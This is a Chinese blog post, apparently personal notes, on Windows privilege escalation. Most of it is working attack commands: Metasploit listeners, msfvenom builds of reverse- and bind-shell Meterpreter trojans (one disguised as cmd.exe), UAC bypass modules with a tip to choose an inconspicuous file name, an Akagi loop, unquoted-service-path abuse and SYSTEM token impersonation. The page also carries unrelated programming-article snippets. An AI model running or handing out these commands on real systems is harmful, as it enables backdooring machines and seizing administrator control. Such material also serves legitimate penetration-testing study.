Windows提权

已于 2024-03-16 16:19:41 修改
阅读量1k 收藏 18
点赞数 27
分类专栏: 内网提权 文章标签: windows 网络安全 web安全 安全
于 2024-03-16 16:17:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74413354/article/details/136764629
版权
本文详细介绍了如何通过内核溢出进行提权,包括使用Metasploit框架的exploit模块,如systeminfo收集系统信息,生成后门木马,以及利用UAC漏洞、CVE-2019-1388和配置错误提权的方法。还涉及了Meterpreter的使用和安全漏洞的利用技巧。
摘要由CSDN通过智能技术生成

内核溢出提权

系统信息收集
msf -- shell -- systeminfo

exp链接

提权辅助网页 Windows提权辅助

http://blog.neargle.com/win-powerup-exp-index/

msf生成后门木马:

使用 exploit/multi/handler监听木马反弹过来的shell:

命令:

msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;

use exploit/multi/handler # 监听木马反弹过来的shell

msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;

set lhost 192.168.x.x # 我们的kali本机ip

set lport 6666 # 我们的kali本机端口

exploit

使用msfvenom模块生成反弹木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.X.X lport=6666 -f exe -o test.exe

伪装成cmd.exe

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.x.x lport=6666 -x cmd.exe -f exe -o test.exe

正向监听:

msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;

use exploit/multi/handler # 使用这个模块连接远程木马;

set payload windows/x64/meterpreter/bind_tcp # 设置正向连接payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;

set rhost 192.168.x.x # 目标主机ip

set lport 6666 # 我们的kali本机端口

exploit

使用msfvenom模块生成正弹木马:

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.x.x lport=6666 -f exe -o test2.exe

复现:

生成后门木马

启动监听

启动木马

通过shell工具上传我们得木马

执行后成功上线

查看打了哪些补丁

shell

systeminfo

对应网站查找exp

通过msf内置框架

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.162.132 LPORT=4444 -f exe > shell.exe

启动监听

运行木马

查看补丁信息

run post/windows/gather/enum_patches

查找exp

run post/multi/recon/local_exploit_suggester

UAC绕过提权

使用exploit/windows/loacal/ask模块绕过UAC

use exploit/windows/local/ask

set filename 123.exe #设置运行程序名,尽可能设置一个不易发现的名字。

set session 17

set lhost 192.168.xx.xx

set lport 2333

run

exploit/windows/local/bypassuac模块绕过UAC

use exploit/windows/local/bypassuac

set session 7

set lhost 192.168.xx.xx

Set lport 2333

Run

利用CVE-2019-1388绕过UAC提权

使用Akagi.exe配合msf提权

for /L %I in (1,1,76) Do @Akagi64.exe %I 后门程序路径

系统配置错误提权

C:\Program Files (x86) \Application Verifier

没有引号来闭合,中间留了空格,系统会把前面默认为程序,后面忽略

可以利用msf生成Program Files (x86).exe

令牌窃取提权

meterpreter > use incognito #进入incognito模块

meterpreter > list_tokens -u #列出令牌

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" #模拟令牌

烂土豆提权

GitHub - foxglovesec/PotatoContribute to foxglovesec/Potato development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/foxglovesec/Potato

小白鱼来了
关注
  • 27
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java小技能:多级组织机构排序并返回树结构(包含每个层级的子节点和业务数据集合)
iOS逆向与安全
07-17 3594
包含每个层级的子节点和业务数据集合。
Collections.unmodifiableList
我这个代码你能看懂吗?
07-17 502
以上方法都可以用来复制一个List,具体选择哪种方法取决于你的需求和使用场景。如果你需要一个简单的、快速的复制,可以使用ArrayList构造函数或addAll方法。如果你需要更灵活的操作,可以考虑使用stream和。
FastAPI 学习之路(五十九)封装统一的json返回处理工具
mr~li的博客
07-18 364
在本篇文章之前的接口,我们每个接口异常返回的数据格式都不一样,处理起来也没有那么方便,因此我们可以封装一个统一的json。改造后,我们的返回消息,可以自定义code,message,data。接下来我们再次改造下我们的新建用户的接口。把代码统一放到common下面的json_tools.py里面,我们在接口返回的时候调用。这样我们就完成了统一接口响应处理,后续我们可以在所有的接口中使用。我们看下修改后的用户返回。我们看下处理后的效果。我们看创建重复的返回。
JAVA8专题-Stream流操作详解
逆天-逍遥哥哥的博客
07-17 1581
JAVA8专题-Stream流操作详解
【STL详解 —— map和set的使用】
jokr_的博客
07-17 994
set是按照一定次序存储元素的容器。默认情况下,std::set 使用 std::less 作为比较函数,这意味着它会使用小于运算符(
【C++刷题】优选算法——链表
最新发布
阿顺的学习记录。
07-21 81
1.两数相加 2.两两交换链表中的节点 3.重排链表 4.合并 K 个升序链表 5.K 个一组翻转链表
JDK新特性(Lambda表达式,Stream流)
m0_73966521的博客
07-17 1154
有且只有一个抽象方法的接口,用@FunctionalInterface去检测我们可以点击这个Comparator这个方法还有我们在线程章节经常用的Runnable接口这时候可能有人会想,Lambda表达式既然只能用函数式接口做为参数,那这个不是很鸡肋嘛难道我要自己去写一个接口,里面专门再只放一个抽象方法,那这不是更麻烦了嘛反正我刚刚学的时候,我确实是有这样的疑问后面问了GPT,其实这个lambda表达式大部分应该是和后面的Stream流一起使用的。
沙尘传输模拟教程(基于wrf-chem)
锐多宝的地理空间
07-17 1130
本实验的目的是使用 WRF-Chem 模拟和分析地表(沙漠)区域产生的沙尘的侵蚀和传输过程。通过构建一个包含沙尘侵蚀图的 WRF 域domain,研究沙尘在大气中的输送和扩散情况。我们的实验区域为中国黄河附近的沙漠,研究时间为2024年7月11日-7月16日,最后得到这段时间的沙尘侵蚀和传输情况。WRF(Weather Research and Forecasting Model)是一个用于大气研究和天气预报的数值模型。
蓝桥杯Python算法竞赛常用的函数库
音符犹如代码的博客
07-20 1136
most_common(x):返回出现频率最高的 x 个元素及其出现次数,以元组列表的形式返回。使用dict时,当访问一个不存在的key,就会抛出KeyError。如果希望这个key不存在时,会使用提供的默认工厂函数创建一个默认值。在字典中获益key有两种方式,第一种是get,第二种通过[]获取。2.repeat:表示这些可迭代序列重复的次数。elements():返回一个迭代器,每个元素重复对应次数。用于计数,他可以统计列表中每个元素出现的次数。2.操作序列和集合方面的函数。clear():清空。
python解析pdf文件
irisMoon06的博客
07-21 293
先安装PyPDF2,据说这是目前最好的解析pdf的包。
2024-07-18 Unity插件 Odin Inspector8 —— Type Specific Attributes
zheliku的博客
07-18 338
​ 本文介绍 Odin Inspector 插件中有关特定类型特性的使用方法。 2.2 AssetSelector 2.3 ChildGameObjectsOnly 2.4 ColorPalette 2.5 DisplayAsString 2.6 EnumPaging 2.7 EnumToggleButtons 2.8 FilePath 2.9 FolderPath 2.10 HideInInlineEditors ​ 数据结构类: ​ 挂载的脚本: 2.1
初阶数据结构的实现2 双向链表
Yusei_0523的博客
07-21 274
双向链表的实现
深入解析`Arrays.asList`的用法与潜在陷阱
weixin_48313678的博客
07-18 632
是一个强大的工具方法,在需要将数组转换为列表时非常方便。然而,开发者需要充分理解其特性和限制,避免常见的陷阱。是一个常用的工具方法,用于将数组转换为List。:列表和数组之间的联动可能导致意外的副作用,特别是在多线程环境中,可能引发数据一致性问题。:由于Java中的泛型数组存在类型擦除问题,使用泛型数组时可能会遇到意外行为。:返回的列表与原数组是联动的,修改列表会直接反映到原数组,反之亦然。的用法、其底层实现机制以及常见的陷阱,辅之以数据和实际案例分析。类中,用于将一个数组转换为一个固定大小的列表。
C++系列-list的模拟实现
in_seattle的博客
07-21 127
在链表中实现迭代器和vector,string中实现迭代器的代码实现不同,这是由于二者之间的底层逻辑不同,无论是string还是vector,因为是先使用后++,所以我们先将节点放在一个变量当中。其实这些主要都是我们运用迭代器的时候所需要实现的代码。它的底层都是连续的,而list不是这样的。我们先对它进行修改,然后返回修改后的值。,所以我们之前使用的那样子就不可以了。在这个构造函数当中,
Day16_集合与迭代器
小鱼儿的博客
07-17 813
集合
Java-集合的嵌套
lizhiwei21的博客
07-21 227
Java中的集合可以进行嵌套,也就是说可以在集合中包含其他集合作为元素。这种嵌套可以用于处理更复杂的数据结构或者数据组织需求。简单的示例。
算法日记day 16(二叉树的广度优先遍历|反转、对称二叉树)
m0_74980681的博客
07-21 647
题目:给你二叉树的根节点 ,返回其节点值的 层序遍历 。 (即逐层地,从左到右访问所有节点)。示例 1: 输入:root = [3,9,20,null,null,15,7] 输出:[[3],[9,20],[15,7]] 示例 2: 输入:root = [1] 输出:[[1]] 示例 3: 输入:root = [] 输出:[] 思路:用队列来存储元素,变量size来存储每一层的元素个数,扫描队头元素,判断其是否有左右孩子,如果有,将其入队,同时该队头元素出队,记录在该层所封装的结果集中,同时siz
java 中stream.map()和stream.reduce()
servepeople的博客
07-17 397
map:用于将流中的每个元素转换为另一种类型或对其进行操作,返回一个新的流。reduce:用于将流中的元素组合成一个单一的值,常用于聚合操作。
linux内核中list的基本用法
qq_45528033的博客
07-17 263
linux内核list基本用法
windows 提权
08-27
Windows提权是指获取管理员权限或系统级权限的过程。在某些情况下,普通用户需要提升权限以执行某些操作或访问受限资源。 有几种常见的Windows提权方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补的漏洞,黑客可以利用这些漏洞来获取系统权限。 2. 利用可信任的二进制文件:有些系统工具或第三方软件可能使用管理员权限运行,黑客可以利用这些工具或软件中的漏洞来提权。 3. 利用服务:Windows系统中运行着多个服务,其中一些可能存在安全问题。黑客可以通过攻击这些服务来提权。 4. 利用注册表设置:有些注册表设置可以导致Windows系统在启动时以管理员权限运行恶意代码。 需要注意的是,提权行为属于非法活动,违反了计算机安全法律法规。在使用任何提权方法之前,请确保你拥有合法的授权,并遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值